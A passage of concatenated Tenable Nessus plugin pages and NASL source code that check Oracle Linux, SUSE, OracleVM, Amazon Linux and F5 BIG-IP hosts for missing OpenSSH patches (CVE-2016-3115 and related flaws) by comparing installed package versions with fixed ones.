(CVE-2016-3115) It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically." ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/el-errata/2016-March/005877.html" ); script_set_attribute( attribute:"solution", value:"Update the affected openssh packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:6"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/08/02"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Oracle Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux"); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux"); os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux"); os_ver = os_ver[1]; if (! preg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 6", "Oracle Linux " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu); flag = 0; if (rpm_check(release:"EL6", reference:"openssh-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"EL6", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"EL6", reference:"openssh-clients-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"EL6", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"EL6", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"EL6", reference:"pam_ssh_agent_auth-0.9.3-114.el6_7")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-ldap / etc"); }
NASL family SuSE Local Security Checks NASL id SUSE_SU-2016-1528-1.NASL description openssh was updated to fix three security issues. These security issues were fixed : - CVE-2016-3115: Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH allowed remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions (bsc#970632). - CVE-2016-1908: Possible fallback from untrusted to trusted X11 forwarding (bsc#962313). - CVE-2015-8325: Ignore PAM environment vars when UseLogin=yes (bsc#975865). The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 91655 published 2016-06-17 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/91655 title SUSE SLES11 Security Update : openssh (SUSE-SU-2016:1528-1) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from SUSE update advisory SUSE-SU-2016:1528-1. # The text itself is copyright (C) SUSE. # include("compat.inc"); if (description) { script_id(91655); script_version("2.11"); script_cvs_date("Date: 2019/09/11 11:22:13"); script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115"); script_name(english:"SUSE SLES11 Security Update : openssh (SUSE-SU-2016:1528-1)"); script_summary(english:"Checks rpm output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote SUSE host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "openssh was updated to fix three security issues. These security issues were fixed : - CVE-2016-3115: Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH allowed remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions (bsc#970632). - CVE-2016-1908: Possible fallback from untrusted to trusted X11 forwarding (bsc#962313). - CVE-2015-8325: Ignore PAM environment vars when UseLogin=yes (bsc#975865). The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=729190" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=932483" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=948902" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=960414" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=961368" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=961494" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=962313" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=965576" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=970632" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=975865" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2015-8325/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2016-1908/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2016-3115/" ); # https://www.suse.com/support/update/announcement/2016/suse-su-20161528-1/ script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?81906f53" ); script_set_attribute( attribute:"solution", value: "To install this SUSE Security Update use YaST online_update. Alternatively you can run the command listed for your product : SUSE Linux Enterprise Server 11-SP4 : zypper in -t patch slessp4-openssh-12603=1 SUSE Linux Enterprise Debuginfo 11-SP4 : zypper in -t patch dbgsp4-openssh-12603=1 To bring your system up-to-date, use 'zypper patch'." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-fips"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-helpers"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/06/08"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/17"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE"); os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE"); os_ver = os_ver[1]; if (! preg(pattern:"^(SLES11)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLES11", "SUSE " + os_ver); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu); sp = get_kb_item("Host/SuSE/patchlevel"); if (isnull(sp)) sp = "0"; if (os_ver == "SLES11" && (! preg(pattern:"^(4)$", string:sp))) audit(AUDIT_OS_NOT, "SLES11 SP4", os_ver + " SP" + sp); flag = 0; if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-6.6p1-21.1")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-askpass-gnome-6.6p1-21.3")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-fips-6.6p1-21.1")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-helpers-6.6p1-21.1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh"); }
NASL family OracleVM Local Security Checks NASL id ORACLEVM_OVMSA-2016-0048.NASL description The remote OracleVM system is missing necessary patches to address critical security updates : - CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317817) - Restore functionallity of pam_ssh_agent_auth in FIPS mode (#1278315) - Initialize devices_done variable for challenge response (#1281468) - Update behaviour of X11 forwarding to match upstream (#1299048) - Ammends previous release, fixing typos and behaviour changes last seen 2020-06-01 modified 2020-06-02 plugin id 91153 published 2016-05-16 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/91153 title OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0048) code # # (C) Tenable Network Security, Inc. # # The package checks in this plugin were extracted from OracleVM # Security Advisory OVMSA-2016-0048. # include("compat.inc"); if (description) { script_id(91153); script_version("2.7"); script_cvs_date("Date: 2019/09/27 13:00:35"); script_cve_id("CVE-2016-3115"); script_name(english:"OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0048)"); script_summary(english:"Checks the RPM output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote OracleVM host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "The remote OracleVM system is missing necessary patches to address critical security updates : - CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317817) - Restore functionallity of pam_ssh_agent_auth in FIPS mode (#1278315) - Initialize devices_done variable for challenge response (#1281468) - Update behaviour of X11 forwarding to match upstream (#1299048) - Ammends previous release, fixing typos and behaviour changes" ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/oraclevm-errata/2016-May/000462.html" ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/oraclevm-errata/2016-May/000461.html" ); script_set_attribute( attribute:"solution", value: "Update the affected openssh / openssh-clients / openssh-server packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssh-server"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.3"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.4"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/05/13"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/16"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"OracleVM Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleVM/release", "Host/OracleVM/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/OracleVM/release"); if (isnull(release) || "OVS" >!< release) audit(AUDIT_OS_NOT, "OracleVM"); if (! preg(pattern:"^OVS" + "(3\.3|3\.4)" + "(\.[0-9]|$)", string:release)) audit(AUDIT_OS_NOT, "OracleVM 3.3 / 3.4", "OracleVM " + release); if (!get_kb_item("Host/OracleVM/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "OracleVM", cpu); if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu); flag = 0; if (rpm_check(release:"OVS3.3", reference:"openssh-5.3p1-117.el6")) flag++; if (rpm_check(release:"OVS3.3", reference:"openssh-clients-5.3p1-117.el6")) flag++; if (rpm_check(release:"OVS3.3", reference:"openssh-server-5.3p1-117.el6")) flag++; if (rpm_check(release:"OVS3.4", reference:"openssh-5.3p1-117.el6")) flag++; if (rpm_check(release:"OVS3.4", reference:"openssh-clients-5.3p1-117.el6")) flag++; if (rpm_check(release:"OVS3.4", reference:"openssh-server-5.3p1-117.el6")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-clients / openssh-server"); }
NASL family Amazon Linux Local Security Checks NASL id ALA_ALAS-2016-668.NASL description It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. last seen 2020-06-01 modified 2020-06-02 plugin id 89965 published 2016-03-17 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/89965 title Amazon Linux AMI : openssh (ALAS-2016-668) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Amazon Linux AMI Security Advisory ALAS-2016-668. # include("compat.inc"); if (description) { script_id(89965); script_version("2.5"); script_cvs_date("Date: 2019/04/11 17:23:06"); script_cve_id("CVE-2016-3115"); script_xref(name:"ALAS", value:"2016-668"); script_name(english:"Amazon Linux AMI : openssh (ALAS-2016-668)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Amazon Linux AMI host is missing a security update." ); script_set_attribute( attribute:"description", value: "It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions." ); script_set_attribute( attribute:"see_also", value:"https://alas.aws.amazon.com/ALAS-2016-668.html" ); script_set_attribute( attribute:"solution", value:"Run 'yum update openssh' to update your system." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-keycat"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:amazon:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/16"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/17"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Amazon Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/AmazonLinux/release", "Host/AmazonLinux/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/AmazonLinux/release"); if (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, "Amazon Linux"); os_ver = pregmatch(pattern: "^AL(A|\d)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Amazon Linux"); os_ver = os_ver[1]; if (os_ver != "A") { if (os_ver == 'A') os_ver = 'AMI'; audit(AUDIT_OS_NOT, "Amazon Linux AMI", "Amazon Linux " + os_ver); } if (!get_kb_item("Host/AmazonLinux/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (rpm_check(release:"ALA", reference:"openssh-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"openssh-clients-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"openssh-debuginfo-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"openssh-keycat-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"openssh-ldap-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"openssh-server-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"pam_ssh_agent_auth-0.9.3-9.23.60.amzn1")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-clients / openssh-debuginfo / openssh-keycat / etc"); }
NASL family Oracle Linux Local Security Checks NASL id ORACLELINUX_ELSA-2016-0465.NASL description From Red Hat Security Advisory 2016:0465 : Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD last seen 2020-06-01 modified 2020-06-02 plugin id 90074 published 2016-03-22 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90074 title Oracle Linux 7 : openssh (ELSA-2016-0465) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2016:0465 and # Oracle Linux Security Advisory ELSA-2016-0465 respectively. # include("compat.inc"); if (description) { script_id(90074); script_version("2.11"); script_cvs_date("Date: 2019/09/27 13:00:37"); script_cve_id("CVE-2016-1908", "CVE-2016-3115"); script_xref(name:"RHSA", value:"2016:0465"); script_name(english:"Oracle Linux 7 : openssh (ELSA-2016-0465)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Oracle Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "From Red Hat Security Advisory 2016:0465 : Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically." ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/el-errata/2016-March/005876.html" ); script_set_attribute( attribute:"solution", value:"Update the affected openssh packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-keycat"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-server-sysvinit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:7"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Oracle Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux"); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux"); os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux"); os_ver = os_ver[1]; if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 7", "Oracle Linux " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu); if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu); flag = 0; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-askpass-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-clients-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-keycat-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-ldap-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-server-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-server-sysvinit-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"pam_ssh_agent_auth-0.9.3-9.25.el7_2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-keycat / etc"); }
NASL family F5 Networks Local Security Checks NASL id F5_BIGIP_SOL93532943.NASL description Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions. (CVE-2016-3115) last seen 2020-06-01 modified 2020-06-02 plugin id 101859 published 2017-07-21 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101859 title F5 Networks BIG-IP : SSHD session.c vulnerability (K93532943) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from F5 Networks BIG-IP Solution K93532943. # # The text description of this plugin is (C) F5 Networks. # include("compat.inc"); if (description) { script_id(101859); script_version("3.5"); script_cvs_date("Date: 2019/01/04 10:03:40"); script_cve_id("CVE-2016-3115"); script_name(english:"F5 Networks BIG-IP : SSHD session.c vulnerability (K93532943)"); script_summary(english:"Checks the BIG-IP version."); script_set_attribute( attribute:"synopsis", value:"The remote device is missing a vendor-supplied security patch." ); script_set_attribute( attribute:"description", value: "Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted 